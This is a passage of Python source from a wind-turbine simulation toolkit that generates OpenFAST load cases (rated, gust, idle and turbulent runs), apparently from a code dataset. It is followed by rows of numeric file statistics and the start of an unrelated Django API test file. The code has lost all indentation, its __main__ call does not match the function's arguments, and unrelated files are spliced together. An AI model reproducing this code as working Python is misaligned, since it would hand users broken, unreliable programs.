ptfm_heave_init = [0.030777174904620515, 0.008329930604820483, -0.022973502300090893, -0.06506947653943342, -0.12101317451310406, -0.20589689839069836, -0.3169518280533253, -0.3831692055885472, -0.4409624802614755, -0.41411738171337675, -0.2375323506471747, -0.1156867221814119, -0.07029955933167854]
ptfm_pitch_init = [0.7519976895165884, 1.104483050851386, 1.5180416334025146, 1.9864587671004394, 2.5152769741130134, 3.1937704945765795, 3.951314212429935, 4.357929703098016, 4.693765745171944, 4.568760630312074, 3.495057478277534, 2.779958240049992, 2.69008798174216]
if metocean_U_init == []:
metocean_U_init = [3.00, 6.00, 8.00, 10.00, 12.00, 14.00, 16.00, 18.00, 20.00, 22.00, 25.00]
metocean_Hs_init = [1.908567568, 1.960162595, 2.062722244, 2.224539415, 2.489931091, 2.802984019, 3.182301485, 3.652236101, 4.182596165, 4.695439504, 5.422289377]
metocean_Tp_init = [12.23645701, 12.14497777, 11.90254947, 11.5196666, 11.05403739, 10.65483551, 10.27562225, 10.13693777, 10.27842325, 10.11660396, 10.96177917]
ptfm_heave = np.interp(U, ptfm_U_init, ptfm_heave_init)
ptfm_surge = np.interp(U, ptfm_U_init, ptfm_surge_init)
ptfm_pitch = np.interp(U, ptfm_U_init, ptfm_pitch_init)
metocean_Hs = np.interp(U, metocean_U_init, metocean_Hs_init)
metocean_Tp = np.interp(U, metocean_U_init, metocean_Tp_init)
else:
floating = False
case_inputs = {}
# simulation settings
# case_inputs[("ElastoDyn","PtfmSgDOF")] = {'vals':['False'], 'group':0}
# case_inputs[("ElastoDyn","PtfmHvDOF")] = {'vals':['False'], 'group':0}
# case_inputs[("ElastoDyn","PtfmPDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","PtfmSwDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","PtfmRDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","PtfmYDOF")] = {'vals':['False'], 'group':0}
case_inputs[("Fst","TMax")] = {'vals':[T], 'group':0}
case_inputs[("Fst","TStart")] = {'vals':[TStart], 'group':0}
case_inputs[("Fst","DT")] = {'vals':dt, 'group':1}
case_inputs[("ElastoDyn","YawDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","EdgeDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","DrTrDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","GenDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ServoDyn","PCMode")] = {'vals':[5], 'group':0}
case_inputs[("ServoDyn","VSContrl")] = {'vals':[5], 'group':0}
case_inputs[("ServoDyn","YCMode")] = {'vals':[5], 'group':0}
case_inputs[("AeroDyn15","WakeMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","AFAeroMod")] = {'vals':[2], 'group':0}
case_inputs[("AeroDyn15","TwrPotent")] = {'vals':[0], 'group':0}
case_inputs[("AeroDyn15","TwrShadow")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","TwrAero")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","SkewMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","TipLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","HubLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TanInd")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","AIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","IndToler")] = {'vals':[1.e-5], 'group':0}
case_inputs[("AeroDyn15","MaxIter")] = {'vals':[5000], 'group':0}
case_inputs[("AeroDyn15","UseBlCm")] = {'vals':['True'], 'group':0}
# inital conditions
case_inputs[("InflowWind","WindType")] = {'vals':[1], 'group':0}
case_inputs[("InflowWind","HWindSpeed")] = {'vals':U, 'group':1}
case_inputs[("ElastoDyn","RotSpeed")] = {'vals':omega, 'group':1}
case_inputs[("ElastoDyn","BlPitch1")] = {'vals':pitch, 'group':1}
case_inputs[("ElastoDyn","BlPitch2")] = case_inputs[("ElastoDyn","BlPitch1")]
case_inputs[("ElastoDyn","BlPitch3")] = case_inputs[("ElastoDyn","BlPitch1")]
if floating == True:
case_inputs[("ElastoDyn","PtfmSurge")] = {'vals':ptfm_surge, 'group':1}
case_inputs[("ElastoDyn","PtfmHeave")] = {'vals':ptfm_heave, 'group':1}
case_inputs[("ElastoDyn","PtfmPitch")] = {'vals':ptfm_pitch, 'group':1}
case_inputs[("HydroDyn","WaveHs")] = {'vals':metocean_Hs, 'group':1}
case_inputs[("HydroDyn","WaveTp")] = {'vals':metocean_Tp, 'group':1}
case_inputs[("HydroDyn","RdtnDT")] = {'vals':dt, 'group':1}
case_inputs[("HydroDyn","WaveMod")] = {'vals':[1], 'group':0}
from wisdem.aeroelasticse.CaseGen_General import CaseGen_General
case_list, case_name_list = CaseGen_General(case_inputs, dir_matrix=runDir, namebase=namebase)
channels = ['Wind1VelX','GenPwr',"RtAeroCp", "RotTorq", "RotThrust", "RotSpeed", "BldPitch1"]
return case_list, case_name_list, channels
def RotorSE_rated(fst_vt, runDir, namebase, TMax, turbine_class, turbulence_class, Vrated, U_init=[], Omega_init=[], pitch_init=[], Turbsim_exe='', ptfm_U_init=[], ptfm_pitch_init=[], ptfm_surge_init=[], ptfm_heave_init=[], metocean_U_init=[], metocean_Hs_init=[], metocean_Tp_init=[]):
# Default Runtime
T = 240.
TStart = 120.
# dt = 0.001
dt = 0.01
# Overwrite for testing
if TMax < T:
T = TMax
TStart = 0.
omega = np.interp(Vrated, U_init, Omega_init)
pitch = np.interp(Vrated, U_init, pitch_init)
# Check if floating
floating_dof = [fst_vt['ElastoDyn']['PtfmSgDOF'], fst_vt['ElastoDyn']['PtfmSwDOF'], fst_vt['ElastoDyn']['PtfmHvDOF'], fst_vt['ElastoDyn']['PtfmRDOF'], fst_vt['ElastoDyn']['PtfmPDOF'], fst_vt['ElastoDyn']['PtfmYDOF']]
if any(floating_dof):
floating = True
if ptfm_U_init == []:
ptfm_U_init = [4., 5., 6., 7., 8., 9., 10., 10.5, 11., 12., 14., 19., 24.]
ptfm_surge_init = [3.8758245863838807, 5.57895688031965, 7.619719770801395, 9.974666446553552, 12.675469235464321, 16.173740623041965, 20.069526574594757, 22.141906121375552, 23.835466098954708, 22.976075549477354, 17.742743260748373, 14.464576583154068, 14.430969814391759]
ptfm_heave_init = [0.030777174904620515, 0.008329930604820483, -0.022973502300090893, -0.06506947653943342, -0.12101317451310406, -0.20589689839069836, -0.3169518280533253, -0.3831692055885472, -0.4409624802614755, -0.41411738171337675, -0.2375323506471747, -0.1156867221814119, -0.07029955933167854]
ptfm_pitch_init = [0.7519976895165884, 1.104483050851386, 1.5180416334025146, 1.9864587671004394, 2.5152769741130134, 3.1937704945765795, 3.951314212429935, 4.357929703098016, 4.693765745171944, 4.568760630312074, 3.495057478277534, 2.779958240049992, 2.69008798174216]
if metocean_U_init == []:
metocean_U_init = [4.00, 6.00, 8.00, 10.00, 12.00, 14.00, 16.00, 18.00, 20.00, 22.00, 24.00]
metocean_Hs_init = [1.908567568, 1.960162595, 2.062722244, 2.224539415, 2.489931091, 2.802984019, 3.182301485, 3.652236101, 4.182596165, 4.695439504, 5.422289377]
metocean_Tp_init = [12.23645701, 12.14497777, 11.90254947, 11.5196666, 11.05403739, 10.65483551, 10.27562225, 10.13693777, 10.27842325, 10.11660396, 10.96177917]
ptfm_heave = [np.interp(Vrated, ptfm_U_init, ptfm_heave_init)]
ptfm_surge = [np.interp(Vrated, ptfm_U_init, ptfm_surge_init)]
ptfm_pitch = [np.interp(Vrated, ptfm_U_init, ptfm_pitch_init)]
metocean_Hs = [np.interp(Vrated, metocean_U_init, metocean_Hs_init)]
metocean_Tp = [np.interp(Vrated, metocean_U_init, metocean_Tp_init)]
else:
floating = False
case_inputs = {}
case_inputs[("Fst","TMax")] = {'vals':[T], 'group':0}
case_inputs[("Fst","TStart")] = {'vals':[TStart], 'group':0}
case_inputs[("Fst","DT")] = {'vals':[dt], 'group':0}
case_inputs[("Fst","OutFileFmt")] = {'vals':[2], 'group':0}
case_inputs[("InflowWind","WindType")] = {'vals':[1], 'group':0}
case_inputs[("InflowWind","HWindSpeed")] = {'vals':[Vrated], 'group':0}
case_inputs[("ElastoDyn","RotSpeed")] = {'vals':[omega], 'group':0}
case_inputs[("ElastoDyn","BlPitch1")] = {'vals':[pitch], 'group':0}
case_inputs[("ElastoDyn","BlPitch2")] = {'vals':[pitch], 'group':0}
case_inputs[("ElastoDyn","BlPitch3")] = {'vals':[pitch], 'group':0}
case_inputs[("ElastoDyn","YawDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","EdgeDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","DrTrDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","GenDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ServoDyn","PCMode")] = {'vals':[5], 'group':0}
case_inputs[("ServoDyn","VSContrl")] = {'vals':[5], 'group':0}
case_inputs[("AeroDyn15","WakeMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","AFAeroMod")] = {'vals':[2], 'group':0}
case_inputs[("AeroDyn15","TwrPotent")] = {'vals':[0], 'group':0}
case_inputs[("AeroDyn15","TwrShadow")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","TwrAero")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","SkewMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","TipLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","HubLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TanInd")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","AIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","IndToler")] = {'vals':[1.e-5], 'group':0}
case_inputs[("AeroDyn15","MaxIter")] = {'vals':[5000], 'group':0}
case_inputs[("AeroDyn15","UseBlCm")] = {'vals':['True'], 'group':0}
if floating == True:
case_inputs[("ElastoDyn","PtfmSurge")] = {'vals':ptfm_surge, 'group':1}
case_inputs[("ElastoDyn","PtfmHeave")] = {'vals':ptfm_heave, 'group':1}
case_inputs[("ElastoDyn","PtfmPitch")] = {'vals':ptfm_pitch, 'group':1}
case_inputs[("HydroDyn","WaveHs")] = {'vals':metocean_Hs, 'group':1}
case_inputs[("HydroDyn","WaveTp")] = {'vals':metocean_Tp, 'group':1}
case_inputs[("HydroDyn","RdtnDT")] = {'vals':[dt], 'group':0}
case_inputs[("HydroDyn","WaveMod")] = {'vals':[1], 'group':0}
namebase += '_rated'
case_list, case_name_list = CaseGen_General(case_inputs, dir_matrix=runDir, namebase=namebase)
channels = ["TipDxc1", "TipDyc1"]
channels += ["RootMxc1", "RootMyc1", "RootMzc1", "RootMxc2", "RootMyc2", "RootMzc2", "RootMxc3", "RootMyc3", "RootMzc3"]
channels += ["RootFxc1", "RootFyc1", "RootFzc1", "RootFxc2", "RootFyc2", "RootFzc2", "RootFxc3", "RootFyc3", "RootFzc3"]
channels += ["RtAeroCp", "RotTorq", "RotThrust", "RotSpeed"]
return case_list, case_name_list, channels
def RotorSE_DLC_1_4_Rated(fst_vt, runDir, namebase, TMax, turbine_class, turbulence_class, Vrated, U_init=[], Omega_init=[], pitch_init=[], Turbsim_exe=''):
# Default Runtime
T = 60.
TStart = 30.
# TStart = 0.
# Overwrite for testing
if TMax < T:
T = TMax
TStart = 0.
iec = CaseGen_IEC()
iec.init_cond[("ElastoDyn","RotSpeed")] = {'U': U_init}
iec.init_cond[("ElastoDyn","RotSpeed")]['val'] = Omega_init
iec.init_cond[("ElastoDyn","BlPitch1")] = {'U': U_init}
iec.init_cond[("ElastoDyn","BlPitch1")]['val'] = pitch_init
iec.init_cond[("ElastoDyn","BlPitch2")] = iec.init_cond[("ElastoDyn","BlPitch1")]
iec.init_cond[("ElastoDyn","BlPitch3")] = iec.init_cond[("ElastoDyn","BlPitch1")]
iec.Turbine_Class = turbine_class
iec.Turbulence_Class = turbulence_class
iec.D = fst_vt['ElastoDyn']['TipRad']*2.
iec.z_hub = fst_vt['InflowWind']['RefHt']
iec.dlc_inputs = {}
iec.dlc_inputs['DLC'] = [1.4]
iec.dlc_inputs['U'] = [[Vrated]]
iec.dlc_inputs['Seeds'] = [[]]
iec.dlc_inputs['Yaw'] = [[]]
iec.transient_dir_change = '-' # '+','-','both': sign for transient events in EDC, EWS
iec.transient_shear_orientation = 'v' # 'v','h','both': vertical or horizontal shear for EWS
iec.wind_dir = runDir
iec.case_name_base = namebase + '_gust'
iec.Turbsim_exe = ''
iec.debug_level = 0
iec.parallel_windfile_gen = False
iec.run_dir = runDir
case_inputs = {}
case_inputs[("Fst","TMax")] = {'vals':[T], 'group':0}
case_inputs[("Fst","TStart")] = {'vals':[TStart], 'group':0}
case_inputs[("Fst","OutFileFmt")] = {'vals':[2], 'group':0}
case_inputs[("ElastoDyn","YawDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF1")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF2")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","EdgeDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","DrTrDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","GenDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ServoDyn","PCMode")] = {'vals':[5], 'group':0}
case_inputs[("ServoDyn","VSContrl")] = {'vals':[5], 'group':0}
case_inputs[("ServoDyn","YCMode")] = {'vals':[5], 'group':0}
case_inputs[("AeroDyn15","WakeMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","AFAeroMod")] = {'vals':[2], 'group':0}
case_inputs[("AeroDyn15","TwrPotent")] = {'vals':[0], 'group':0}
case_inputs[("AeroDyn15","TwrShadow")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","TwrAero")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","SkewMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","TipLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","HubLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TanInd")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","AIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","IndToler")] = {'vals':[1.e-5], 'group':0}
case_inputs[("AeroDyn15","MaxIter")] = {'vals':[5000], 'group':0}
case_inputs[("AeroDyn15","UseBlCm")] = {'vals':['True'], 'group':0}
case_list, case_name_list = iec.execute(case_inputs=case_inputs)
channels = ["TipDxc1", "TipDyc1", "TipDzc1", "TipDxc2", "TipDyc2", "TipDzc2", "TipDxc3", "TipDyc3", "TipDzc3"]
channels += ["RootMxc1", "RootMyc1", "RootMzc1", "RootMxc2", "RootMyc2", "RootMzc2", "RootMxc3", "RootMyc3", "RootMzc3"]
channels += ["RootFxc1", "RootFyc1", "RootFzc1", "RootFxc2", "RootFyc2", "RootFzc2", "RootFxc3", "RootFyc3", "RootFzc3"]
channels += ["RtAeroCp", "RotTorq", "RotThrust", "RotSpeed", "NacYaw"]
channels += ["B1N1Fx", "B1N2Fx", "B1N3Fx", "B1N4Fx", "B1N5Fx", "B1N6Fx", "B1N7Fx", "B1N8Fx", "B1N9Fx"]
channels += ["B1N1Fy", "B1N2Fy", "B1N3Fy", "B1N4Fy", "B1N5Fy", "B1N6Fy", "B1N7Fy", "B1N8Fy", "B1N9Fy"]
return case_list, case_name_list, channels
def RotorSE_DLC_7_1_Steady(fst_vt, runDir, namebase, TMax, turbine_class, turbulence_class, U, U_init=[], Omega_init=[], pitch_init=[], Turbsim_exe=''):
# Extreme 1yr return period wind speed with a power fault resulting in the blade not feathering
# Default Runtime
T = 60.
TStart = 30.
# Overwrite for testing
if TMax < T:
T = TMax
TStart = 0.
Pitch = 0.
Omega = 0.
case_inputs = {}
case_inputs[("Fst","TMax")] = {'vals':[T], 'group':0}
case_inputs[("Fst","TStart")] = {'vals':[TStart], 'group':0}
case_inputs[("Fst","OutFileFmt")] = {'vals':[2], 'group':0}
case_inputs[("InflowWind","WindType")] = {'vals':[1], 'group':0}
case_inputs[("InflowWind","HWindSpeed")] = {'vals':[U], 'group':0}
case_inputs[("InflowWind","PLexp")] = {'vals':[0.11], 'group':0}
case_inputs[("ElastoDyn","RotSpeed")] = {'vals':[Omega], 'group':0}
case_inputs[("ElastoDyn","BlPitch1")] = {'vals':[Pitch], 'group':0}
case_inputs[("ElastoDyn","BlPitch2")] = {'vals':[Pitch], 'group':0}
case_inputs[("ElastoDyn","BlPitch3")] = {'vals':[Pitch], 'group':0}
case_inputs[("ElastoDyn","YawDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF1")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF2")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","EdgeDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","DrTrDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","GenDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ServoDyn","PCMode")] = {'vals':[0], 'group':0}
case_inputs[("ServoDyn","VSContrl")] = {'vals':[5], 'group':0}
case_inputs[("ServoDyn","YCMode")] = {'vals':[5], 'group':0}
case_inputs[("AeroDyn15","WakeMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","AFAeroMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","TwrPotent")] = {'vals':[0], 'group':0}
case_inputs[("AeroDyn15","TwrShadow")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","TwrAero")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","SkewMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","TipLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","HubLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TanInd")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","AIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","IndToler")] = {'vals':[1.e-5], 'group':0}
case_inputs[("AeroDyn15","MaxIter")] = {'vals':[5000], 'group':0}
case_inputs[("AeroDyn15","UseBlCm")] = {'vals':['True'], 'group':0}
namebase += '_idle50yr'
case_list, case_name_list = CaseGen_General(case_inputs, namebase=namebase, save_matrix=False)
channels = ["TipDxc1", "TipDyc1", "TipDzc1", "TipDxc2", "TipDyc2", "TipDzc2", "TipDxc3", "TipDyc3", "TipDzc3"]
channels += ["RootMxc1", "RootMyc1", "RootMzc1", "RootMxc2", "RootMyc2", "RootMzc2", "RootMxc3", "RootMyc3", "RootMzc3"]
channels += ["RootFxc1", "RootFyc1", "RootFzc1", "RootFxc2", "RootFyc2", "RootFzc2", "RootFxc3", "RootFyc3", "RootFzc3"]
channels += ["RtAeroCp", "RotTorq", "RotThrust", "RotSpeed", "NacYaw"]
channels += ["B1N1Fx", "B1N2Fx", "B1N3Fx", "B1N4Fx", "B1N5Fx", "B1N6Fx", "B1N7Fx", "B1N8Fx", "B1N9Fx"]
channels += ["B1N1Fy", "B1N2Fy", "B1N3Fy", "B1N4Fy", "B1N5Fy", "B1N6Fy", "B1N7Fy", "B1N8Fy", "B1N9Fy"]
return case_list, case_name_list, channels
def RotorSE_DLC_1_1_Turb(fst_vt, runDir, namebase, TMax, turbine_class, turbulence_class, U, U_init=[], Omega_init=[], pitch_init=[], Turbsim_exe='', debug_level=0, cores=0, mpi_run=False, mpi_comm_map_down=[]):
# Default Runtime
T = 630.
TStart = 30.
# Overwrite for testing
if TMax < T:
T = TMax
TStart = 0.
iec = CaseGen_IEC()
iec.init_cond[("ElastoDyn","RotSpeed")] = {'U': U_init}
iec.init_cond[("ElastoDyn","RotSpeed")]['val'] = [0.95*omega_i for omega_i in Omega_init]
iec.init_cond[("ElastoDyn","BlPitch1")] = {'U': U_init}
iec.init_cond[("ElastoDyn","BlPitch1")]['val'] = pitch_init
iec.init_cond[("ElastoDyn","BlPitch2")] = iec.init_cond[("ElastoDyn","BlPitch1")]
iec.init_cond[("ElastoDyn","BlPitch3")] = iec.init_cond[("ElastoDyn","BlPitch1")]
iec.Turbine_Class = turbine_class
iec.Turbulence_Class = turbulence_class
iec.D = fst_vt['ElastoDyn']['TipRad']*2.
iec.z_hub = fst_vt['InflowWind']['RefHt']
iec.dlc_inputs = {}
iec.dlc_inputs['DLC'] = [1.1]
iec.dlc_inputs['U'] = [[U]]
# iec.dlc_inputs['Seeds'] = [[1]]
iec.dlc_inputs['Seeds'] = [[310414237, 1764051066, 1935526301, 333954657, -960771537, 714191176]] # nothing special about these seeds, randomly generated
iec.dlc_inputs['Yaw'] = [[]]
iec.transient_dir_change = '-' # '+','-','both': sign for transient events in EDC, EWS
iec.transient_shear_orientation = 'v' # 'v','h','both': vertical or horizontal shear for EWS
iec.wind_dir = runDir
iec.case_name_base = namebase + '_turb'
iec.Turbsim_exe = Turbsim_exe
iec.debug_level = debug_level
iec.cores = cores
iec.run_dir = runDir
iec.overwrite = True
# iec.overwrite = False
if cores > 1:
iec.parallel_windfile_gen = True
else:
iec.parallel_windfile_gen = False
# mpi_run = False
if mpi_run:
iec.mpi_run = mpi_run
iec.comm_map_down = mpi_comm_map_down
case_inputs = {}
case_inputs[("Fst","TMax")] = {'vals':[T], 'group':0}
case_inputs[("Fst","TStart")] = {'vals':[TStart], 'group':0}
case_inputs[("Fst","OutFileFmt")] = {'vals':[2], 'group':0}
case_inputs[("ElastoDyn","YawDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF1")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","FlapDOF2")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","EdgeDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","DrTrDOF")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","GenDOF")] = {'vals':['True'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwFADOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF1")] = {'vals':['False'], 'group':0}
case_inputs[("ElastoDyn","TwSSDOF2")] = {'vals':['False'], 'group':0}
case_inputs[("ServoDyn","PCMode")] = {'vals':[5], 'group':0}
case_inputs[("ServoDyn","VSContrl")] = {'vals':[5], 'group':0}
case_inputs[("ServoDyn","YCMode")] = {'vals':[5], 'group':0}
case_inputs[("AeroDyn15","WakeMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","AFAeroMod")] = {'vals':[2], 'group':0}
case_inputs[("AeroDyn15","TwrPotent")] = {'vals':[0], 'group':0}
case_inputs[("AeroDyn15","TwrShadow")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","TwrAero")] = {'vals':['False'], 'group':0}
case_inputs[("AeroDyn15","SkewMod")] = {'vals':[1], 'group':0}
case_inputs[("AeroDyn15","TipLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","HubLoss")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TanInd")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","AIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","TIDrag")] = {'vals':['True'], 'group':0}
case_inputs[("AeroDyn15","IndToler")] = {'vals':[1.e-5], 'group':0}
case_inputs[("AeroDyn15","MaxIter")] = {'vals':[5000], 'group':0}
case_inputs[("AeroDyn15","UseBlCm")] = {'vals':['True'], 'group':0}
case_list, case_name_list = iec.execute(case_inputs=case_inputs)
channels = ["TipDxc1", "TipDyc1", "TipDzc1", "TipDxc2", "TipDyc2", "TipDzc2", "TipDxc3", "TipDyc3", "TipDzc3"]
channels += ["RootMxc1", "RootMyc1", "RootMzc1", "RootMxc2", "RootMyc2", "RootMzc2", "RootMxc3", "RootMyc3", "RootMzc3"]
channels += ["RootFxc1", "RootFyc1", "RootFzc1", "RootFxc2", "RootFyc2", "RootFzc2", "RootFxc3", "RootFyc3", "RootFzc3"]
channels += ["RtAeroCp", "RotTorq", "RotThrust", "RotSpeed", "NacYaw"]
channels += ["B1N1Fx", "B1N2Fx", "B1N3Fx", "B1N4Fx", "B1N5Fx", "B1N6Fx", "B1N7Fx", "B1N8Fx", "B1N9Fx"]
channels += ["B1N1Fy", "B1N2Fy", "B1N3Fy", "B1N4Fy", "B1N5Fy", "B1N6Fy", "B1N7Fy", "B1N8Fy", "B1N9Fy"]
return case_list, case_name_list, channels
if __name__ == "__main__":
# power_curve()
case_list, case_name_list = RotorSE_rated('test', 60., 11., 12.1, 0.)
| 58.893761
| 314
| 0.598213
| 4,077
| 34,924
| 4.950454
| 0.088791
| 0.126344
| 0.10058
| 0.159342
| 0.942972
| 0.934598
| 0.931626
| 0.928256
| 0.922658
| 0.916118
| 0
| 0.133236
| 0.174751
| 34,924
| 592
| 315
| 58.993243
| 0.567052
| 0.225833
| 0
| 0.741333
| 0
| 0
| 0.25844
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013333
| false
| 0
| 0.013333
| 0
| 0.04
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7cbd18f81e46f2db0487c08404e866f9deb90d70
| 41,954
|
py
|
Python
|
openbook_communities/tests/views/community/test_views.py
|
TamaraAbells/okuna-api
|
f87d8e80d2f182c01dbce68155ded0078ee707e4
|
[
"MIT"
] | 164
|
2019-07-29T17:59:06.000Z
|
2022-03-19T21:36:01.000Z
|
openbook_communities/tests/views/community/test_views.py
|
TamaraAbells/okuna-api
|
f87d8e80d2f182c01dbce68155ded0078ee707e4
|
[
"MIT"
] | 188
|
2019-03-16T09:53:25.000Z
|
2019-07-25T14:57:24.000Z
|
openbook_communities/tests/views/community/test_views.py
|
TamaraAbells/okuna-api
|
f87d8e80d2f182c01dbce68155ded0078ee707e4
|
[
"MIT"
] | 80
|
2019-08-03T17:49:08.000Z
|
2022-02-28T16:56:33.000Z
|
import json
from django.conf import settings
from django.core.files import File
from django.urls import reverse
from faker import Faker
from rest_framework import status
from openbook_common.tests.models import OpenbookAPITestCase
from openbook_common.tests.helpers import make_user, make_authentication_headers_for_user, \
make_community_name, make_community, \
make_community_title, make_community_rules, make_community_description, make_community_user_adjective, \
make_community_users_adjective, make_community_avatar, make_community_cover, make_category, make_global_moderator, \
make_moderation_category
from openbook_communities.models import Community, CommunityNotificationsSubscription
from openbook_moderation.models import ModeratedObject
fake = Faker()
class CommunityAPITests(OpenbookAPITestCase):
"""
CommunityAPITests
"""
def test_can_retrieve_public_community(self):
"""
should be able to retrieve a public community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
url = self._get_url(community_name=community_name)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
parsed_response = json.loads(response.content)
self.assertIn('name', parsed_response)
response_name = parsed_response['name']
self.assertEqual(response_name, community_name)
def test_can_retrieve_private_community(self):
"""
should be able to retrieve a private community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='T')
